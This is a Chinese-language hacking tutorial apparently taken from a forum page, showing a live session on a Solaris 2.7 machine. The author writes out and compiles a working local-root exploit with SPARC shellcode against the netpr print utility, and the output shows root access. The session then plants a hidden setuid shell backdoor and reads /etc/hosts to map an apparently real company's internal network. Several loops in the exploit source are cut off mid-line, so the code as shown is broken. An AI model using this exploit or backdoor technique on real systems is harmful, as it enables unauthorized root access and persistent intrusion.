UNIX
检测日记二
教程开发者:世纪黑马 QQ:395749798
-------------------------------------------------test--------------------------------------------------------------
$ set
EDITOR=vi
HOME=/export/home/delex
HZ=100
IFS=
LD_LIBRARY_PATH=/export/home/software/setadapters/solaris2/cgi-bin/lib:
LOGNAME=delex
MAIL=/usr/mail/delex
MAILCHECK=600
MANPATH=:/usr/share/man:/usr/local/man
OPTIND=1
PATH=/usr/bin::/usr/bin:/usr/local/bin:/usr/bin:/usr/ucb:/usr/ccs/bin:/usr/sbin:/usr/local:/usr/local/bin
:/export/home/oracle/product/8.1.6/bin
PS1=$
PS2=>
SHELL=/bin/sh
TERM=vt100
TZ=Hongkong
_INIT_PREV_LEVEL=S
_INIT_RUN_LEVEL=3
_INIT_RUN_NPREV=0
_INIT_UTS_ISA=sparc
_INIT_UTS_MACHINE=sun4u
_INIT_UTS_NODENAME=develop
_INIT_UTS_PLATFORM=SUNW,Ultra-5_10
_INIT_UTS_RELEASE=5.7
_INIT_UTS_SYSNAME=SunOS
_INIT_UTS_VERSION=Generic_106541-14
$ uname -a
SunOS develop 5.7 Generic_106541-14 sun4u sparc SUNW,Ultra-5_10
$ cd /tmp
$ cat > test.c (***用cat
命令写一个
文件***)
/*## copyright LAST STAGE OF DELIRIUM dec 1999 poland *://lsd-pl.net/ #*/
/*## /usr/lib/lp/bin/netpr #*/
/* requires to specify the address of a host with 515 port opened */
#define NOPNUM 4000
#define ADRNUM 1200
#define ALLIGN 3
char shellcode[]=
"\x20\xbf\xff\xff" /* bn,a */
"\x20\xbf\xff\xff" /* bn,a */
"\x7f\xff\xff\xff" /* call */
"\x90\x03\xe0\x20" /* add %o7,32,%o0 */
"\x92\x02\x20\x10" /* add %o0,16,%o1 */
"\xc0\x22\x20\x08" /* st %g0,[%o0+8] */
"\xd0\x22\x20\x10" /* st %o0,[%o0+16] */
"\xc0\x22\x20\x14" /* st %g0,[%o0+20] */
"\x82\x10\x20\x0b" /* mov 0xb,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh"
;
char jump[]=
"\x81\xc3\xe0\x08" /* jmp %o7+8 */
"\x90\x10\x00\x0e" /* mov %sp,%o0 */
;
static char nop[]="\x80\x1c\x40\x11";
main(int argc,char **argv){
char buffer[10000],adr[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM dec 1999 poland //lsd-pl.net/\n");
printf("/usr/lib/lp/bin/netpr solaris 2.7 sparc\n\n");
if(argc==1){
printf("usage: %s lpserver\n",argv[0]);
exit(-1);
}
*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+7124+2000;
envp[0]=&buffer[0];
envp[1]=0;
b=&buffer[0];
sprintf(b,"xxx=");
b+=4;
for(i=0;i<1+4-((strlen(argv[1])%4));i++) *b++=0xff;
for(i=0;i
for(i=0;i
*b=0;
b=&buffer[5000];
for(i=0;i
for(i=0;i
*b=0;
execle("/usr/lib/lp/bin/netpr","lsd","-I","bzz-z","-U","x!x","-d",argv[1],
"-p",&buffer[5000],"/bin/sh",0,envp);
}
^D (***这里是按ctrl + d 结束写文件,你用vi来写也可以,ftp,rcp等上传也可以。***)
(***源
程序在
http://lsd-pl.net/files/get?SOLARIS/solsparc_netpr ***)
$ ls -al /tmp (***查看test.c是否建立***)
total 1330
drwxrwxrwt 7 sys sys 1049 Jul 4 19:07 .
drwxrwxrwx 35 root root 1024 Jun 29 16:52 ..
drwxrwxr-x 2 root root 176 May 4 14:39 .X11-pipe
drwxrwxr-x 2 root root 176 May 4 14:39 .X11-unix
drwxrwxrwx 2 root root 179 May 4 14:39 .pcmcia
drwxrwxrwx 2 root other 181 Jun 20 13:18 .removable
drwxrwxrwt 2 root root 327 May 4 14:39 .rpc_door
-rwxrwxr-x 1 root other 614 May 8 11:17 EncTest.class
-rw------- 1 root other 265936 May 4 14:40 dtdbcache_:0
-rw------- 1 render9 render 0 May 8 11:42 mpcRaOhb
-rw------- 1 render9 render 0 May 8 13:02 mptWaGYf
-rw-rw-r-- 1 root sys 5248 May 4 14:39 ps_data
-rw-rw-r-- 1 root other 0 Jun 20 13:18 sdtvolcheck399
-rw-r--r-- 1 root other 4 May 4 14:39 speckeysd.lock
-rw-rw-r-- 1 delex staff 2019 Jul 4 19:10 test.c
-rw-rw-r-- 1 root sys 326236 May 7 11:30 ups_data
$ gcc -o test test.c (***一般编译用这个方式就可以了,更多资料请查看帮助***)
$ ./test
copyright LAST STAGE OF DELIRIUM dec 1999 poland //lsd-pl.net/
/usr/lib/lp/bin/netpr solaris 2.7 sparc
usage: ./test lpserver
$ ./test localhost
copyright LAST STAGE OF DELIRIUM dec 1999 poland //lsd-pl.net/
/usr/lib/lp/bin/netpr solaris 2.7 sparc
# id
uid=1035(delex) gid=20(staff) euid=0(root) (***成功获得root***)
# mkdir /usr/lib/...
# cp /bin/ksh /usr/lib/…/.x (***做个简单的后门***)
# chmod +s /usr/lib/…/.x
# cat /etc/hosts (***看看这个
网络多大***)
##################################################
## Gips Limited Server Hosts Names
## 2001-03-01 (develop)
##################################################
127.0.0.1 localhost loghost
##################################################
## Gipex (Internal - CITIC Back-End)
192.168.2.1 office-i2 gate-citic-backend
192.168.2.5 render1 render1-i1
##################################################
## Gipex (Internal - CITIC Office)
192.168.1.1 office-i1 gate-citic-office
##################################################
## Gipex (Internal - iLink)
192.168.100.1 backup-i1 gate-ilink-vpn
## .2 - .9
192.168.100.10 www1-i1
192.168.100.11 db1 db1-i1 www0-i1 www0 www0.xxwex.com
192.168.100.12 snap1
## .13
192.168.100.14 snap2
192.168.100.15 snap3
192.168.100.16 www2-i1 mail-i1
192.168.100.17 www2-i2 mail-i2
192.168.100.18 render2 render2-i1
192.168.100.19 render2-i2
## .20 - .252
192.168.100.253 switch1
## .254
# /usr/sbin/ping 192.168.100.253
ICMP Host Unreachable from gateway wc-sf1.kage.net (210.76.87.2)
for icmp from develop (192.168. 0.2) to www1-i1 (192.168.100.253)
ICMP Host Unreachable from gateway wc-sf1.kage.net (210.76.87.2)
for icmp from develop (192.168.0.2) to www1-i1 (192.168.100.253)
ICMP Host Unreachable from gateway wc-sf1.kage.net (210.76.87.2)
for icmp from develop (192.168.0.2) to www1-i1 (192.168.100.253)
^C (***
局域网是连通的 ***)
#
-------------------------------------------------test--------------------------------------------------------------
Powered by IXPUB.Net © 2001-2007 All Right Reserved. 
